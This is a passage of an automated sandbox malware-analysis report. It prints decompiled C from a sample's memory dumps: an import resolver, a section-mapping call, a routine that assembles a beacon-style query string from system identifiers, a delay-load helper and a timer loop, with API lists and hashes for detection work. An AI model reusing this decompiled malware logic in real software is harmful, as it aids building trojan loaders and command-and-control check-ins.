Instruction Fuzzy Hash: DE210BB1D00209AFDB11CFE9C8849DEFBB9FF48354F108469E605F3210D7359A498B61

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C160D, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E0C160D(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e0c4140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e0c160d
0x6e0c1616
0x6e0c161b
0x6e0c1621
0x6e0c162a
0x6e0c1630
0x6e0c1632
0x6e0c1635
0x6e0c163a
0x6e0c1641
0x6e0c1641
0x6e0c1645
0x6e0c164b
0x6e0c1650
0x00000000
0x00000000
0x6e0c1656
0x6e0c1660
0x6e0c1662
0x6e0c1665
0x6e0c1668
0x6e0c166c
0x6e0c1674
0x6e0c1676
0x6e0c1679
0x6e0c16e1
0x6e0c16e1
0x6e0c16e5
0x00000000
0x00000000
0x6e0c167e
0x6e0c1684
0x6e0c1686
0x6e0c1699
0x6e0c169c
0x6e0c169c
0x6e0c169c
0x6e0c16a0
0x6e0c1688
0x6e0c1688
0x6e0c1690
0x6e0c1692
0x00000000
0x00000000
0x00000000
0x00000000
0x6e0c1692
0x6e0c1680
0x6e0c1680
0x6e0c1694
0x6e0c1694
0x6e0c1694
0x6e0c16a3
0x6e0c16a6
0x6e0c16a8
0x6e0c16af
0x6e0c16aa
0x6e0c16aa
0x6e0c16aa
0x6e0c16b7
0x6e0c16bd
0x6e0c16bf
0x6e0c16ef
0x6e0c16c1
0x6e0c16c1
0x6e0c16c4
0x6e0c16c6
0x6e0c16ce
0x6e0c16ce
0x6e0c16d3
0x6e0c16d5
0x6e0c16dc
0x6e0c16de
0x6e0c16de
0x6e0c16de
0x00000000
0x6e0c16de
0x00000000
0x6e0c16bf
0x6e0c166e
0x6e0c166e
0x6e0c1672
0x00000000
0x00000000
0x6e0c1672
0x6e0c16f2
0x6e0c16f2
0x6e0c16f9
0x6e0c16fe
0x00000000
0x00000000
0x6e0c1704
0x6e0c170f
0x00000000
0x6e0c170f
0x6e0c1706
0x6e0c1706
0x6e0c170c
0x00000000
0x6e0c170c
0x6e0c163a
0x6e0c1710
0x6e0c1715

APIs

LoadLibraryA.KERNELBASE ref: 6E0C1645
GetProcAddress.KERNEL32(?,00000000), ref: 6E0C16B7

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 9f5ed742f40d0c9e05ec254f971ff86886f2bd162783dc73983269f1424b51bc
Instruction ID: b347e80a15261ee0a03239e8c07ff1defedaca92c8e781df42ae0061b8183f6c
Opcode Fuzzy Hash: 9f5ed742f40d0c9e05ec254f971ff86886f2bd162783dc73983269f1424b51bc
Instruction Fuzzy Hash: 84312871A00207DFDB40CF99C894BAEB7F8BF05B55B2840A9D811E7241E774DA49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C101B, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E0C101B(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e0c102d
0x6e0c1033
0x6e0c1041
0x6e0c1048
0x6e0c104d
0x6e0c1053
0x00000000
0x6e0c1054
0x00000000

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E0C1048

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 1675dd8756ccd8ed5c7bc3c2edee49f2c2dd08c69cae5748b9f9c5f374ea3e37
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: BAF012B590020CBFEB119FE5CC85D9FBBBDEB44394B108939F152E1090D6709E089A61

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9DB0, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00BB9DB0(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xbbd018; // 0xd4967592
				asm("bswap eax");
				_t61 =  *0xbbd014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0xbbd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xbbd00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0xbbd2a4; // 0x2a5a5a8
				_t3 = _t64 + 0xbbe633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d153, _t63, _t62, _t61, _t60,  *0xbbd02c,  *0xbbd004, _t59);
				_t67 = E00BBA358();
				_t68 =  *0xbbd2a4; // 0x2a5a5a8
				_t4 = _t68 + 0xbbe673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E00BB5369(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0xbbd2a4; // 0x2a5a5a8
					_t7 = _t127 + 0xbbe8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0xbbd238, 0, _v8);
				}
				_t73 = E00BBA0B7();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0xbbd2a4; // 0x2a5a5a8
					_t11 = _t122 + 0xbbe8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0xbbd238, 0, _v8);
				}
				_t147 =  *0xbbd32c; // 0x36195b0
				_t75 = E00BB3802(0xbbd00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0xbbd238, _t153, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xbbd238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xbbd238, _t153, _v20);
						goto L26;
					}
					E00BB10BF(GetTickCount());
					_t82 =  *0xbbd32c; // 0x36195b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xbbd32c; // 0x36195b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xbbd32c; // 0x36195b0
					_t149 = E00BB61B9(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0xbbd238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0xbbc2ac);
					_push(_t149);
					_t94 = E00BBA755();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xbbd238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E00BB8ECC(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E00BB14EF();
						L22:
						HeapFree( *0xbbd238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E00BBA617(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_v12 = E00BB1A34(_t158, _a4, _a8, _a12);
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E00BB5DE8(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E00BB4C8F(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00BB5DE8(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x00bb9db0
0x00bb9db0
0x00bb9db0
0x00bb9db9
0x00bb9dc2
0x00bb9dc4
0x00bb9dc4
0x00bb9dd1
0x00bb9ddc
0x00bb9ddf
0x00bb9de4
0x00bb9ded
0x00bb9df0
0x00bb9df5
0x00bb9df8
0x00bb9dfd
0x00bb9e00
0x00bb9e0c
0x00bb9e19
0x00bb9e1b
0x00bb9e21
0x00bb9e26
0x00bb9e31
0x00bb9e33
0x00bb9e36
0x00bb9e38
0x00bb9e3d
0x00bb9e43
0x00bb9e48
0x00bb9e4b
0x00bb9e50
0x00bb9e5d
0x00bb9e5f
0x00bb9e65
0x00bb9e6f
0x00bb9e6f
0x00bb9e71
0x00bb9e76
0x00bb9e7b
0x00bb9e7e
0x00bb9e83
0x00bb9e90
0x00bb9e92
0x00bb9ea0
0x00bb9ea0
0x00bb9ea2
0x00bb9eb0
0x00bb9eb5
0x00bb9eb7
0x00bb9ebc
0x00bba07f
0x00bba089
0x00bba092
0x00bb9ec2
0x00bb9ece
0x00bb9ed4
0x00bb9ed9
0x00bba073
0x00bba07d
0x00000000
0x00bba07d
0x00bb9ee5
0x00bb9eea
0x00bb9ef3
0x00bb9f04
0x00bb9f08
0x00bb9f11
0x00bb9f17
0x00bb9f26
0x00bb9f2d
0x00bb9f36
0x00bb9f3c
0x00bba067
0x00bba071
0x00000000
0x00bba071
0x00bb9f48
0x00bb9f4e
0x00bb9f4f
0x00bb9f54
0x00bb9f59
0x00bba05d
0x00bba065
0x00000000
0x00bba065
0x00bb9f62
0x00bb9f69
0x00bb9f71
0x00bb9f76
0x00bb9f7f
0x00bb9f85
0x00bb9f8c
0x00bb9f91
0x00bb9f96
0x00bba095
0x00bba049
0x00bba049
0x00bba04e
0x00bba059
0x00bba05b
0x00000000
0x00bba05b
0x00bb9fa0
0x00bb9fa5
0x00bb9faa
0x00bb9faf
0x00bb9fbf
0x00bb9fc2
0x00bb9fc8
0x00bb9fce
0x00bb9fd4
0x00bb9fd7
0x00bb9fdd
0x00bb9fe0
0x00bb9fe5
0x00bb9fe9
0x00bb9fe9
0x00bb9ff5
0x00bba001
0x00bba005
0x00bba007
0x00bba00c
0x00bba00e
0x00bba013
0x00bba018
0x00bba025
0x00bba02d
0x00bba030
0x00bba030
0x00bba00c
0x00000000
0x00bb9ff7
0x00bb9ffb
0x00bba032
0x00bba035
0x00bba03e
0x00000000
0x00000000
0x00000000
0x00000000
0x00bba03e
0x00bb9ffd
0x00000000
0x00bb9ffd
0x00bb9ff5

APIs

GetTickCount.KERNEL32 ref: 00BB9DC4
wsprintfA.USER32 ref: 00BB9E14
wsprintfA.USER32 ref: 00BB9E31
wsprintfA.USER32 ref: 00BB9E5D
HeapFree.KERNEL32(00000000,?), ref: 00BB9E6F
wsprintfA.USER32 ref: 00BB9E90
HeapFree.KERNEL32(00000000,?), ref: 00BB9EA0
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BB9ECE
GetTickCount.KERNEL32 ref: 00BB9EDF
RtlEnterCriticalSection.NTDLL(03619570), ref: 00BB9EF3
RtlLeaveCriticalSection.NTDLL(03619570), ref: 00BB9F11

Part of subcall function 00BB61B9: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00BB6028,?,036195B0), ref: 00BB61E4
Part of subcall function 00BB61B9: lstrlen.KERNEL32(?,?,?,00BB6028,?,036195B0), ref: 00BB61EC
Part of subcall function 00BB61B9: strcpy.NTDLL ref: 00BB6203
Part of subcall function 00BB61B9: lstrcat.KERNEL32(00000000,?), ref: 00BB620E
Part of subcall function 00BB61B9: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BB6028,?,036195B0), ref: 00BB622B

StrTrimA.SHLWAPI(00000000,00BBC2AC,?,036195B0), ref: 00BB9F48

Part of subcall function 00BBA755: lstrlen.KERNEL32(03619908,00000000,00000000,7742C740,00BB6053,00000000), ref: 00BBA765
Part of subcall function 00BBA755: lstrlen.KERNEL32(?), ref: 00BBA76D
Part of subcall function 00BBA755: lstrcpy.KERNEL32(00000000,03619908), ref: 00BBA781
Part of subcall function 00BBA755: lstrcat.KERNEL32(00000000,?), ref: 00BBA78C

lstrcpy.KERNEL32(00000000,?), ref: 00BB9F69
lstrcpy.KERNEL32(?,?), ref: 00BB9F71
lstrcat.KERNEL32(?,?), ref: 00BB9F7F
lstrcat.KERNEL32(?,00000000), ref: 00BB9F85

Part of subcall function 00BB8ECC: lstrlen.KERNEL32(?,00000000,00BBD330,00000001,00BB577D,00BBD00C,00BBD00C,00000000,00000005,00000000,00000000,?,?,?,00BB8880,00BB197C), ref: 00BB8ED5
Part of subcall function 00BB8ECC: mbstowcs.NTDLL ref: 00BB8EFC
Part of subcall function 00BB8ECC: memset.NTDLL ref: 00BB8F0E

wcstombs.NTDLL ref: 00BBA018

Part of subcall function 00BB1A34: SysAllocString.OLEAUT32(?), ref: 00BB1A6F

Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4

HeapFree.KERNEL32(00000000,?,?), ref: 00BBA059
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00BBA065
HeapFree.KERNEL32(00000000,?,?,036195B0), ref: 00BBA071
HeapFree.KERNEL32(00000000,?), ref: 00BBA07D
HeapFree.KERNEL32(00000000,?), ref: 00BBA089

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3748877296-0
Opcode ID: 4262fe7f6a32533459b06d014cfbd39beef11feb7392ef8c223bba62db0e615d
Instruction ID: 01e4d9c7eb7e7a2bd146ec3a4d18fc43a74950f31ae201099522fea5cab2ac45
Opcode Fuzzy Hash: 4262fe7f6a32533459b06d014cfbd39beef11feb7392ef8c223bba62db0e615d
Instruction Fuzzy Hash: 82915871900209EFCB11EFA8DC88AAE7BF9EF08310F5445A5F408E7261DBB5D951DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BBADA5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00BBADA5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xbb0000;
				_t115 = _t139[3] + 0xbb0000;
				_t131 = _t139[4] + 0xbb0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xbb0000;
				_v16 = _t139[5] + 0xbb0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xbb0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xbbd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xbbd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xbbd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xbbd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xbbd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xbbd198; // 0x0
										 *_t102 = _t125;
										 *0xbbd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xbbd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x00bbadb4
0x00bbadca
0x00bbadd0
0x00bbadd2
0x00bbadd7
0x00bbaddd
0x00bbade2
0x00bbade5
0x00bbadf3
0x00bbadfa
0x00bbadfd
0x00bbae00
0x00bbae01
0x00bbae04
0x00bbae07
0x00bbae0a
0x00bbae0f
0x00bbae1e
0x00000000
0x00bbae24
0x00bbae2e
0x00bbae38
0x00bbae3d
0x00bbae3f
0x00bbae49
0x00bbae4c
0x00bbae4f
0x00bbae55
0x00bbae57
0x00bbae57
0x00bbae5a
0x00bbae5d
0x00bbae62
0x00bbae66
0x00bbae79
0x00bbae7b
0x00bbaf23
0x00bbaf23
0x00bbaf2a
0x00bbaf2d
0x00bbaf37
0x00bbaf37
0x00bbaf3b
0x00bbafb9
0x00bbafbc
0x00bbafbe
0x00bbafbe
0x00bbafc5
0x00bbafc7
0x00bbafd1
0x00bbafd4
0x00bbafd7
0x00bbafd7
0x00000000
0x00bbaf3d
0x00bbaf40
0x00bbaf6e
0x00bbaf78
0x00bbaf7c
0x00bbaf84
0x00bbaf87
0x00bbaf8e
0x00bbaf98
0x00bbaf98
0x00bbaf9c
0x00bbafa1
0x00bbafb0
0x00bbafb6
0x00bbafb6
0x00bbaf9c
0x00000000
0x00bbaf47
0x00bbaf4a
0x00bbaf52
0x00bbaf67
0x00bbaf6c
0x00000000
0x00000000
0x00bbaf6c
0x00000000
0x00bbaf52
0x00bbaf40
0x00bbaf3b
0x00bbae81
0x00bbae88
0x00bbae98
0x00bbae9b
0x00bbaea1
0x00bbaea5
0x00bbaee8
0x00bbaef4
0x00bbaf1d
0x00bbaef6
0x00bbaefa
0x00bbaf00
0x00bbaf08
0x00bbaf0a
0x00bbaf0d
0x00bbaf13
0x00bbaf15
0x00bbaf15
0x00bbaf08
0x00bbaefa
0x00000000
0x00bbaef4
0x00bbaead
0x00bbaeb0
0x00bbaeb7
0x00bbaec7
0x00bbaeca
0x00bbaeda
0x00000000
0x00bbaee0
0x00bbaec1
0x00bbaec5
0x00000000
0x00000000
0x00000000
0x00bbaec5
0x00bbae92
0x00bbae96
0x00000000
0x00000000
0x00000000
0x00bbae96
0x00bbae6f
0x00bbae73
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBAE1E
LoadLibraryA.KERNELBASE(?), ref: 00BBAE9B
GetLastError.KERNEL32 ref: 00BBAEA7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00BBAEDA

Strings

$, xrefs: 00BBADF3

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 7e690f6327aa644830fbebe9756c8f1bd0412c61516c390be36c59b0f3044eed
Instruction ID: 730fc633fb22095ab07e310e2f1c90e00c0eb623fdc8eadc7b774381170878c6
Opcode Fuzzy Hash: 7e690f6327aa644830fbebe9756c8f1bd0412c61516c390be36c59b0f3044eed
Instruction Fuzzy Hash: 7A8139B1A00609AFDB11DFA8D890BFEBBF5EF58700F508169E905E7250EBB0E905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BB7780, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00BB7780(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xbbd240);
					_v20 = 0;
					_v16 = 0;
					L00BBB088();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xbbd26c; // 0x1ec
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xbbd24c = 5;
						} else {
